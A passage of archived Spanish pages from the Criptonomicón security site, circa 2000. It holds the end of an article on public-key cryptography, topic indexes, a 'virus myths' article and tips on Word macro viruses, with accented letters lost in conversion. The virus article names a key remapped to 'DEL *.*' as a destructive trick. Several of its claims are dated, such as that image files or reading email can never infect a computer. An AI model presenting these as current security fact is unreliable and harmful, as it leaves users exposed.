nmero de usuarios con los que desee comunicarse. Estas claves tienen la
asombrosa propiedad que cada una de ellas invierte la accin de la otra
pero, y aqu est el punto ms relevante, a partir de una no se puede
obtener la otra. De este modo se puede definir un mtodo de cifrado que es
el que se denomina cifrado de clave pblica, que consiste en fijar una de las
dos claves de cada usuario como pblica y la otra como privada. La clave
privada deber ser custodiada por el usuario y es imprescindible que se
mantenga en secreto. La clave pblica, por el contrario, se publicar junto
con la identidad del usuario. As cuando se quiera enviar un mensaje seguro

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos44.html (1 of 3) [25/10/2000 02:30:47 p.m.]

Criptografa de clave pblica

a un usuario se coger la clave pblica de este y se utilizar para cifrar el


mensaje que se quiera enviar. El resultado de esta operacin ser el texto
cifrado que slo el propietario de la clave privada correspondiente a esa
clave pblica podr descifrar.
Llegados a este punto, la pregunta ms natural que nos surge es: pueden
existir dos claves las cuales inviertan sus acciones pero que el hecho de
conocer una no implique conocer la otra? La respuesta a esta pregunta es si
y la herramienta para obtenerlas son los nmeros primos. Si bien hemos
dicho que no se puede obtener la clave privada a travs de la pblica,
debemos matizar ste no se puede. Cuando nos referimos a no poder
queremos decir que no existen algoritmos ni ordenadores suficientemente
eficientes para obtener una clave a partir de la otra en un tiempo razonable
(de nuevo el calificativo razonable depender en cada caso del periodo de
validez que se quiera que tengan las claves). El problema bsico que se
utiliza en los sistemas de clave pblica es el de la factorizacin. Factorizar
un nmero es descomponerlo en producto de nmeros primos y esta
operacin, cuando tratamos de nmeros grandes, resulta un problema difcil.
Existen diferentes sistemas de clave pblica pero el ms extendido y el que
se considera un estndar de facto es el RSA. Este criptosistema, creado en
1978 por Rivest Shamir y Adleman (de aqu su nombre), utiliza
esencialmente que la tarea de factorizar es muy difcil.
As pues, parece que el problema de la seguridad quedara del todo
solucionado con los sistemas de clave pblica, pero entonces surge la
siguiente pregunta: cmo sabemos que la clave pblica de un usuario es
del usuario que dice ser?, en otras palabras: cmo es posible asegurar que
usamos la clave pblica de quien queremos que reciba nuestro mensaje y no
otra clave que alguien ha publicado con una identidad falsa para suplantar a
nuestro interlocutor real?. Es aqu donde se aplica el concepto de
certificacin. Las claves pblicas deben estar certificadas por una entidad en
la que todos los usuarios tengan confianza con tal de asegurar que dicha
clave pblica pertenezca a quien dice pertenecer. Como es de suponer, se
inicia aqu un debate que est en alza y que lo seguir estando: quienes
deben ser las autoridades certificadoras? Y si estas certifican, quien certifica
que los certificados que ellas expiden han sido emitidos por ellas, es decir,
quien certifica a las entidades certificadoras?
Como vemos, la clave pblica no ha resuelto del todo el problema de la
seguridad, ya que si bien ha contribuido a reducir el nmero de claves
necesarias para comunicarse con mltiples usuarios, ha aadido el problema
de la confianza con una tercera parte certificadora.
Publicado en el Boletn del Criptonomicn #44.
Jordi Herrera Joancomart es licenciado en Matemticas por la Universitat Autnoma de
Barcelona. Ha trabajado en banca electrnica en Andersen Consulting. Actualmente es
doctorando del Programa de Telemtica de la Universitat Politcnica de Catalunya y
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos44.html (2 of 3) [25/10/2000 02:30:47 p.m.]

Criptografa de clave pblica

becario de investigacin en la Universitat Rovira i Virgili.

Informacin adicional

http://www.cs.adfa.oz.au/teaching/studinfo/csc/lectures/publickey.html
http://fennario.math.pitt.edu/~frank/crypto/crypto/node41.html
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos44.html (3 of 3) [25/10/2000 02:30:47 p.m.]

Hablan los expertos - Comercio electrnico

Comercio electrnico

Criptologa y seguridad

Comercio electrnico

Cuestiones legales

Desde esta pgina puedes acceder a los artculos publicados sobre comercio
electrnico en el Boletn del Criptonomicn en la seccin Hablan los expertos.

Intimidad y privacidad

Virus

Luces y sombras en las compras por Internet

El lado oscuro de SET

Seguridad de las tarjetas de crdito en Internet

Falsas expectativas del comercio electrnico

Seguridad en Tarjetas con Microprocesador

Los secretos del comercio electrnico en Espaa

Claves para la venta de productos o servicios a travs de Internet

Seguridad en los nuevos medios de pago

Presente y futuro del comercio electrnico

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/comercio-e.html [25/10/2000 02:30:47 p.m.]

Hablan los expertos - Criptologa y seguridad

Comercio electrnico

Criptologa y seguridad

Criptologa y seguridad

Cuestiones legales

Desde esta pgina puedes acceder a los artculos publicados sobre criptologa y
seguridad en el Boletn del Criptonomicn en la seccin Hablan los expertos.

Intimidad y privacidad

Virus

Control de accesos

Marcas de agua

Mitos sobre ICMP

Proteccin integral de la informacin de la empresa

Las claves criptogrficas

El azar en la criptografa

Qu son los certificados digitales

Votaciones a travs de Internet

Criptografa de clave pblica

Conocimiento Nulo

Cortafuegos

Proteccin del copyright electrnico: Fingerprinting

Canales subliminales en sistemas de clave pblica

Cmo funcionan las firmas digitales

Criptografa visual

Esquemas umbrales

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/criptologia.html (1 of 2) [25/10/2000 02:30:48 p.m.]

Hablan los expertos - Criptologa y seguridad


visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/criptologia.html (2 of 2) [25/10/2000 02:30:48 p.m.]

Hablan los expertos - Cuestiones legales y jurdicas

Comercio electrnico

Criptologa y seguridad

Cuestiones legales y jurdicas

Cuestiones legales

Desde esta pgina puedes acceder a los artculos publicados sobre cuestiones legales
y jurdicas en el Boletn del Criptonomicn en la seccin Hablan los expertos.

Intimidad y privacidad

Nuevo reglamento de seguridad: obstculo o ayuda al desarrollo de la


empresa espaola?

Situacin legal de la criptologa en Espaa

Es legal el uso de cookies?

Virus

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/legal.html [25/10/2000 02:30:48 p.m.]

Hablan los expertos - Intimidad y privacidad

Comercio electrnico

Criptologa y seguridad

Intimidad y privacidad

Cuestiones legales

Desde esta pgina puedes acceder a los artculos publicados sobre intimidad y
privacidad en el Boletn del Criptonomicn en la seccin Hablan los expertos.

Intimidad y privacidad

Virus

Por qu no me gusta ENFOPOL

Recelos y sospechas en el mundo PGP

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/intimidad.html [25/10/2000 02:30:48 p.m.]

Hablan los expertos - Virus

Comercio electrnico

Criptologa y seguridad

Virus

Cuestiones legales

Desde esta pgina puedes acceder a los artculos publicados sobre virus en el Boletn
del Criptonomicn en la seccin Hablan los expertos.

Intimidad y privacidad

Virus

Virus: verdades y mentiras

A la caza del troyano

Comparativa de antivirus

La amenaza de los ltimos caballos de Troya

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/virus.html [25/10/2000 02:30:48 p.m.]

Virus: verdades y mentiras

Comercio electrnico

Criptologa y seguridad

Virus: verdades y mentiras

Cuestiones legales

Por Jos Luis Lpez

Intimidad y privacidad

Ud. debe tener en cuenta que los virus, son meramente programas escritos

Virus

para crear copias de s mismos y para infectar a otros programas. Estos


programas infectados pueden ser cdigos ejecutables que contienen
archivos (comnmente .COM o. EXE) o sectores de booteo. La nica
manera para que cualquier virus puede infectar su PC es si ejecuta uno de
estos programas o bootea su computador desde un disquete con el sector
de booteo infectado. Esto es as de sencillo, pero hay muchos mitos y
desinformacin al respecto de los virus, y eso hace que a veces las cosas no
parezcan ser tan sencillas. Estos mitos son perjudiciales tan solo si Ud. se
los cree.
Y cules son los mitos ms comunes?. Veremos algunos de ellos.

Podemos infectarnos al conectarnos simplemente a


una red (Internet), un sistema de BBS, o a una red de
rea local?
NO. La nica manera para que Ud. puede obtener un virus deber ser
ejecutando un programa en su PC que tal vez obtuvo desde la red. El simple
acto de transferir un programa es totalmente inofensivo; y slo si luego de
transferirlo, Ud. ejecuta un programa (y no lo revisa con un antivirus), su PC
puede llegar a ser infectado. Es claro que el simple acto de leer el correo
electrnico no lo puede infectar. (Sin embargo es conveniente le eche una
mirada a nuestro artculo "Virus de macros en el correo electrnico?" del
lunes 27 de abril).
LA MAYORIA de los PC atacados son infectadas por virus de sector de inicio
del sistema tal como Michelangelo, Stoned, Monkey, o Form. . Estos virus
slo se divulgan por bootear desde un disquete infectado. Esto hace que
este tipo de infeccin no tenga mucho que ver con las redes, sino ms bien a
un imprudente manejo de los disquetes a travs de varias mquinas sin un
estricto control.
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos67.html (1 of 8) [25/10/2000 02:30:49 p.m.]

Virus: verdades y mentiras

Existe una potencial amenaza de la que es conveniente que est enterado.


Puede existir alguna peligro de infeccin si su browser o lector de correo
ejecutan automticamente MS Word o (raramente), MS Excel. Si usted tiene
estos programas instalados y su software configurado para lanzar estos
productos, le sugerimos que utilice el men de configuracin de su
navegador para desconectar esa opcin.
Hay otra amenaza de la que debera estar enterado (no se trata de un virus
pero puede entrar dentro de una categora denominada de "sucias
artimaas"). Si usted tiene el drive ANSI.SYS cargado (generalmente lo
podra hacer desde el CONFIG.SYS), alguien podra mandar una sucesin
de caracteres a su pantalla (conocido como una sucesin de cdigos ANSI)
que asignan un conjunto de pulsaciones de teclas a alguna tecla
determinada. Estas pulsaciones podran tratarse fcilmente de algo tan
daino como un DEL *.*. Cundo usted usa esa tecla, en realidad estara
ejecutando la orden con la que fue reasignada. Pero aunque esto es posible,
es bastante raro que ocurra, ya que muy pocas personas cargan el
ANSI.SYS, y si lo hacen (esto ocurre sobre todo en el mundo de los BBS),
usan una versin mejorada que impide un remapeo del teclado.

Los virus slo infectan. .com y .exe?


Los virus infectan tambin los sectores de inicio del sistema (boot). Estos
virus pueden ocultarse bastante bien, puesto que los sectores no aparecen
como archivos y son por lo tanto "invisibles" para un usuario medio. Los virus
de sectores del sistema ocasionan casi un 80% de todos los dems tipos de
infeccin. Los virus pueden infectar tambin cualquier archivo que sea
ejecutado de alguna manera. Esto incluye a ciertos drives (comnmente
.SYS o .BIN) y los archivos overlay (.OVR). Es tambin posible escribir virus
para archivos de lote (.BAT), y para macros de procesadores de texto y
hojas de clculo (Word, Excel, etc.)

Creera usted que un virus puede infectar sus


archivos sin cambiar un solo byte al archivo?
Bueno, esto es verdad! Algunos virus infectan sus archivos localizando un
nombre similar al del programa a infectar (generalmente .EXE). El virus crea
entonces otro archivo con el mismo nombre pero terminado en ".COM" (si
usted no indica la terminacin, el sistema operativo ejecuta los .COM con
preferencia a los .EXE), y este .COM contiene el cdigo de infeccin. El virus
puede colocar este archivo en el mismo directorio o en otro directorio
indicado en el PATH del DOS. Digamos que un virus de este tipo se ejecuta
(residente) en su PC y decide que es tiempo de infectar un archivo. Hace un
examen buscando un archivo .EXE ("WP.EXE" por ejemplo). Entonces crea
un archivo llamado "WP.COM" que contiene el virus. Si usted escribe solo
"WP" y pulsa ENTER, el DOS ejecutar "WP.COM" en vez de "WP. EXE". El
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos67.html (2 of 8) [25/10/2000 02:30:49 p.m.]

Virus: verdades y mentiras

virus se ejecuta, y posiblemente infecte ms archivos y luego carga y ejecuta


"WP.EXE". El usuario probablemente no advierta nada malo. Este tipo de
virus es afortunadamente fcil de descubrir por la presencia de estos
archivos extras. Existen algunos casos dnde es normal tener ambos
".COM" y ".EXE" pero esto es relativamente raro. Tambin es posible para
un virus el suplantar archivos .COM o. EXE por archivos de lote . BAT, pero
es poco probable que esta sea una estrategia efectiva. Si usted usa algn
reemplazo de COMMAND.COM, como NDOS o 4DOS, existe un riesgo
adicional de que un virus suplante los archivos .BTM.

Puede infectarse con un virus de archivos de datos?


Puesto que los datos no se ejecutan, Ud. no puede llegar a ser infectado por
los datos. La mayora de los mitos que suelen espantar a la gente, hablan de
los virus transmitidos por archivos de datos o por el correo electrnico. Si
alguien le manda un archivo de datos que contenga un virus, usted tendra
que renombrar el archivo y entonces ejecutarlo para llegar a ser infectado!
Desde que los usuarios de MS Word pueden recibir virus dentro de lo que
parecen ser archivos de documento, se puede llegar a infectar con un
documento enviado por e-mail o bajado de la red. Pero la infeccin slo
puede ocurrir cuando usted ejecute MS Word en su computadora, por lo que
es conveniente configurar su navegador o lector de correo para no lanzar
MS Word automticamente para abrir archivos .DOC (hasta revisarlos antes
con un antivirus).
Note el punto. Por leer un mensaje, no se infecta. Pero cudese de abrir
cualquier archivo adjunto a un mensaje sin revisarlo antes.
Los archivos de datos no lo pueden infectar pero usted puede llegar a ser
infectado por un disquete que no es bootable y que aparentemente no
contenga ningn programa. La explicacin para esto es que todos los
disquetes tienen un sector de booteo que contiene un pequeo cdigo
ejecutable (programa) que puede ser infectado por un virus del sector de
inicio. Si usted deja un disquete puesto en A: cuando resetea su PC, podra
infectarse!. Usted ver el tpico "No hay disco de sistema o error de disco",
etc., este mensaje, generado por el pequeo cdigo insertado en el sector
de inicio de los disquetes, podra ser la seal de que el virus se acaba de
ejecutar, infectando su PC. Existen varios antivirus que revisan su disquetera
antes de apagar el PC, pero lo ms aconsejable es desconectar la opcin de
bootear primero desde A: en el BIOS.

Se puede obtener un virus desde los cookies de la


Web?
Los cookies o galletas son solo archivos de datos que algunos sitios guardan
en su disco. Como no son ejecutados, no hay ninguna posibilidad que ellos
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos67.html (3 of 8) [25/10/2000 02:30:49 p.m.]

Virus: verdades y mentiras

puedan lanzar ningn virus (ni trojan). Las cookies no encierran ninguna
amenaza. Muchos sitios, almacenan en estos archivos, cierta informacin
cuando usted los visita, y de ese modo no es necesario volver a realizar
algunos ajustes como los de las preferencias (frames o no frames por
ejemplo), etc. . De todos modos, tanto el IE Explorer como el Netscape, le
dan a Ud. algn control sobre si desea aceptar o no estos "cookies".
Puede configurar su browser para aceptarlos o no, o el navegador le puede
preguntar si acepta o no, cada vez que un sitio desea almacenar una
"galleta" en su disco. Estos archivos, adems, se guardan normalmente en
un directorio (carpeta) separado.

Puede obtener un virus a travs de un archivo


grfico?
Los archivos de imgenes (*. JPG o *. GIF) contienen solo datos que forman
las imgenes; no son nunca ejecutados, sino simplemente mostrados. Lo
que debemos revisar son los programas "visualizadores" de grficos que
bajemos de Internet (por ejemplo), antes de ejecutarlos por primera vez,
pero JAMAS podremos infectarnos con un archivo grfico cualquiera sea su
extensin.
Casi todo sitio de la Web contiene un nmero grande de imgenes que se
transfieren y son visualizados automticamente en su monitor. Usted
tambin puede transferir directamente los archivos grficos (generalmente *.
JPG o *.GIF) y visualizarlos o imprimirlos en su PC. Estos archivos grficos
no contienen programas. Son simplemente datos que un programa lector de
grficos interpreta para poder mostrar una imagen en su PC. Si un virus
pudiera ser contenido en uno de estos archivos, no sera ninguna amenaza
porque nunca tendra posibilidad de ejecutarse.
Sin embargo, existen dos razones por las cules los mitos de los virus en
archivos de imgenes nunca desaparecern.
Una de esas razones, es que ocurre (con demasiada frecuencia) que alguien
simplemente "pincha" en un grfico y entonces su PC se congela, o sea que
se produce un "crash" o cuelgue de la computadora (a veces con algn dao
a los programas y datos en el disco). Esto es siempre debido a algn "bug"
(o conflicto) en el software del visualizador, y no a causa del ataque de algn
virus o trojan.
La otra razn, y quienes frecuentan los grupos de noticias deben conocerlo
bastante bien, es que han habido varios casos de virus divulgados a travs
de los foros de Usenet, en donde se difunden (ocurre ms a menudo en las
reas relacionadas con el sexo) archivos grficos que incluyen un programa
lector de imgenes. Tal programa (y NO la imagen en s misma) es el que
puede estar infectado.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos67.html (4 of 8) [25/10/2000 02:30:49 p.m.]

Virus: verdades y mentiras

Puede infectar un virus la memoria CMOS?


Los PC AT (Intel 80286) y posteriores, contienen una pequea memoria
(CMOS) alimentada con una batera para almacenar la informacin de la
configuracin y para mantener la fecha y la hora. Esta memoria nunca se
ejecuta, y aunque pueda ser daada por un virus, usted nunca puede llegar
a ser infectado por la memoria CMOS. Algn virus, o una batera que falla
pueden daar o cambiar estos datos, por lo que es importante que Ud.
guarde los datos de configuracin de su BIOS en algn papel a mano para
poder restaurarlos en el caso de que algo falle. Si sus datos de CMOS se
corrompen puede ser incapaz de iniciar su PC.

Se puede engaar a los virus escondiendo el


COMMAND.COM?
El archivo COMMAND.COM es un programa que se ejecuta cada vez que
usted inicia su PC. Uno de los primeros virus conocidos, slo infectaba a
este archivo, por lo que surgi la idea de esconder al COMMAND.COM. Hoy
muchos virus evitan infectar este archivo, desde que muchos productos
antivirus seleccionan a este y otros pocos para revisarlos siempre por
defecto. Con los virus actuales, esconder el COMMAND.COM es totalmente
intil.

Se pueden descubrir los virus, vigilando los tamaos


y las fechas de los programas?
Aunque es til verificar el tamao y la fecha de los archivos ejecutables para
prevenir cambios inesperados, esto no es una manera segura de atrapar o
descubrir algn virus. Muchos virus son bastante inteligentes para no
cambiar las fechas cuando infectan el archivo.
Incluso algunos virus esconden el cambio del tamao del archivo cuando el
mismo es infectado.
Y en el caso de virus que afectan archivos PE (Portable Executable, un
formato de ejecutables de Windows 9x), estos pueden ocultarse dentro del
archivo "husped" sin cambiar su tamao.

Hay "curas sencillas" para el problema de los virus?


Muchos productos dicen ser "la solucin definitiva para el problema de los
virus", y esto es algo imposible de sostener. Todos apreciaran comprar un
producto que nos liberara para siempre de los virus. Desgraciadamente no
existe tal producto. Es importante entender cmo trabajan los antivirus, para
entender sus debilidades. Usted no puede correr simplemente un programa
y estar seguro de cualquier ataque de virus; es importante entender qu Ud.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos67.html (5 of 8) [25/10/2000 02:30:49 p.m.]

Virus: verdades y mentiras

se arriesga demasiado usando un solo antivirus. Ningn antivirus le dar


jams un 100% de seguridad. Y ms importante an es mantenerse
actualizado. Los antivirus que se precien de tales, suelen ofrecer
actualizaciones que en algunos casos es diaria. Bajarlas de la red es el
camino ms rpido para estar al da. Y aunque cada antivirus mantiene su
propia pgina, en sitios como el que mantenemos en
http://www.nativo.com/videosoft, usted puede encontrar actualizadas
diariamente las versiones de evaluacin de los antivirus ms usados.

Cambiar los atributos de mis archivos pueden


protegerme de los virus?
Usted puede usar la orden del DOS ATTRIB para poner los atributos de
SOLO LECTURA (+R) a sus archivos, pero es muy fcil para un virus (o
cualquier programa) evitar esta proteccin, que a veces solo causa ms
problemas. Esto es ms evidente en las redes. Sin embargo trabajando en
redes usted puede ponerle a los archivos derechos de acceso para
ejecutarlo o leerlo solamente.
Esto funciona muy bien y prevendr que los archivos sean infectados desde
otra estacin de trabajo en la red. Pero debemos notar que hablamos de
derechos de acceso no de atributos.

Estoy protegido si utilizo solo software de empresas


conocidas?
Varios expertos en virus han sugerido que cualquiera estar ms protegido
si evita usar el software transferido va Internet o de origen Shareware. No
hay ninguna lgica para creer esto!. Los virus ms comunes son virus del
sector de booteo que se esparcen cuando alguien bootea con un disco
infectado. Para esparcir virus del sector de inicio, un disquete debe ser
pasado por varias mquinas. El Michelangelo se divulg extensamente
porque muchos disquetes de distribucin de software original y de empresas
conocidas, fueron infectados con este virus. Es por supuesto sabio
cerciorarse que usted transfiere o compra su software de una fuente que
revisa cada programa con antivirus conocidos. Bastantes virus se han
embarcado directamente por el fabricante de software. Aunque Ud. no lo
crea, muchas compaas importantes han divulgado virus por revender
disquetes devueltos por otros distribuidores, que por supuesto han pasado
por alguna mquina que los infect. Uno de los casos ms recientes es el de
la propia IBM que embarc sus nuevos modelos Aptiva con software
infectado por el peligroso virus Win-CIH apenas un mes antes que se
activara una rutina muy peligrosa de este virus.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos67.html (6 of 8) [25/10/2000 02:30:49 p.m.]

Virus: verdades y mentiras

Puedo proteger mi disco duro para que no se pueda


escribir en l?
Hay varios programas que dicen proteger su disco duro de los intentos de
escribir algo en l. Pero como esto se hace con un software, puede ser
evitado fcilmente por un virus. Esta tcnica, sin embargo, parar algunos
virus y proteger su disco de que alguien inadvertidamente, escriba en l.
Puede hacerse esto por hardware, pero esta tecnologa no est disponible
an.
Sin embargo, Ud. si puede proteger de escritura a sus disquetes, cosa muy
fcil con los disquetes de 3 , y tambin con los de 5 , aunque estos ya
son muy raros de ver. Sin embargo existe el riesgo (mnimo) de que alguna
disquetera pueda estar defectuosa y permita escribir en el disquete. Si duda,
proteja un disquete e intente escribir algo en l.

Son los virus la amenaza ms grave para mis datos?


Los virus estn entre las amenazas menos probables de las que puedan
llegar a destruir sus datos. Problemas tales como "bugs" y cuelgues del
sistema, o conflictos con software residente (especialmente caches de disco)
tienen mucha ms posibilidad de daar sus programas y datos que los virus,
siempre que se mantenga actualizado con los antivirus y revise cualquier
programa antes de ejecutarlo.

El software es intil contra los virus?


Quiz acabemos rindindonos y sea necesario esperar una solucin de
hardware a prueba de tontos?. Es cierto que ciertos tipos de software
pueden permitir que los virus se divulguen; algunos antivirus no visualizan
nuevos virus escritos despus que la versin del escner fue liberada, y
ningn programa puede detener un virus una vez que se ejecut en su PC.
Pueden entonces derrotar los virus a cualquier software?... Es esto
cierto?. NO!. Es falso. Los virus deben jugar su partido con sus reglas, y Ud.
tiene una ventaja si las conoce. Todos los virus deben cambiar algo en su
PC para infectarlo. Estos cambios se pueden descubrir, aunque se
desconozca la existencia del virus. Un virus puede intentar esconder estos
cambios usando ciertas tcnicas que eviten que sean detectados sus
intentos de leer o escribir en el disco, pero en ese caso el virus puede ser
descubierto por su presencia en la memoria (residente) de su PC. Un virus
siempre se traicionar en la memoria, en los sectores de inicio del sistema, o
en los archivos ejecutables.
Ud. tiene el control, si mantiene una estricta conducta con los programas
ejecutables que corren en su PC.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos67.html (7 of 8) [25/10/2000 02:30:49 p.m.]

Virus: verdades y mentiras

Publicado en el Boletn del Criptonomicn desde #50 hasta #66.


Jos Luis Lpez.

Informacin adicional

Cmo protegerse frente a virus

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos67.html (8 of 8) [25/10/2000 02:30:49 p.m.]

Cmo protegerse frente a virus

Consejos para
administradores
Consejos para
usuarios

Cmo protegerse frente a virus

Cmo protegerse de los sustos en documentos Word

Navidades sin disgustos

Los virus en disquetes

No creas todo lo que oyes ni instales todo lo que descargues

Participa con tus consejos y trucos


Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/virus.html [25/10/2000 02:30:49 p.m.]

Cmo protegerse de los sustos en documentos Word

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

Cmo protegerse de los sustos en


documentos Word
Resulta muy sencillo incluir cualquier tipo de objeto dentro de un documento Word,
incluso programas ejecutables, siendo los virus de Macro (pequeos programas
escritos generalmente en VisualBasic) uno de los mayores terrores en ficheros Word
y Excel.
La regla bsica es: abre slo ficheros .doc que provengan de una fuente conocida o al
menos fiable. Claro que esta regla no te protege al 100%, pero reduce tus riesgos de
infectarte.

CGI

Java

JavaScript

Cookies

Por supuesto nunca abras un programa .exe embebido dentro del documento Word,
ya que podra contener un virus.
En Word7 u Office 97, activa la opcin de abrir documentos sin macros. Si no est
activada, Word te avisar en cualquier caso al disponerse a abrir un documento que
contenga macros.
Para ms informacin, consulta la informacin de Microsoft, Comprobar que los
documentos no contienen macros con virus.

Crashes

Participa con tus consejos y trucos


Agujeros

Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Spam

Remailers
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Anonimato

Correo seguro

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/word.html (1 of 2) [25/10/2000 02:30:49 p.m.]

Cmo protegerse de los sustos en documentos Word


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/word.html (2 of 2) [25/10/2000 02:30:49 p.m.]

Comprobar que los documentos no contienen macros con virus

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Comprobar que los documentos no


contienen macros con virus
Un virus de macros es un tipo de virus que afecta a los sistemas y que se almacena en
las macros de un documento o una plantilla. Al abrir un documento de este tipo, el
virus de macros se activa, se transmite al sistema y se almacena en la plantilla
Normal. Desde ese momento, todos los documentos que guarde se "infectarn"
automticamente con el virus de macros y si otros usuarios los abren, el virus
tambin se transmitir a sus equipos.
Word no puede examinar la unidad de disco, el disco duro o la unidad de red para
buscar y eliminar virus de macros. Si el usuario desea este tipo de proteccin, tendr
que comprar e instalar software antivirus especializado. Sin embargo, Word puede
mostrar un mensaje de advertencia siempre que se abra un documento donde se
incluyan macros que podran contener un virus. El usuario decidir, a continuacin,
si desea abrir el documento con o sin las macros.
Si cree que el documento contiene macros que pueden serle de utilidad; por
ejemplo, una hoja de pedidos utilizada en la organizacin, es posible que desee
abrir el documento con las macros.
Sin embargo, puede que el documento no contenga macros o que no confe en
su origen. Por ejemplo, puede que se trate de un documento adjunto a un
mensaje de correo electrnico o que proceda de una ubicacin de la red o de
Internet que no sea segura. Si es as, lo mejor es abrir el documento sin macros
para evitar la posible transmisin del virus.

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Si lo desea, puede dejar de comprobar si los documentos contienen macros con virus.
Cuando Word muestre el mensaje de advertencia de virus de macros, desactive la
casilla de verificacin Preguntar siempre antes de abrir documentos con macros o
personalizaciones. Tambin puede desactivar la comprobacin de macros en
cualquier momento. En el men Herramientas, haga clic en Opciones, en la ficha
General y, a continuacin, desactive la casilla de verificacin Proteccin antivirus en
macros.
Nota Para obtener ms informacin acerca de los virus de macros, incluso cmo
adquirir software antivirus que examine los documentos existentes y elimine los
virus de macros, puede descargar la informacin sobre proteccin antivirus de
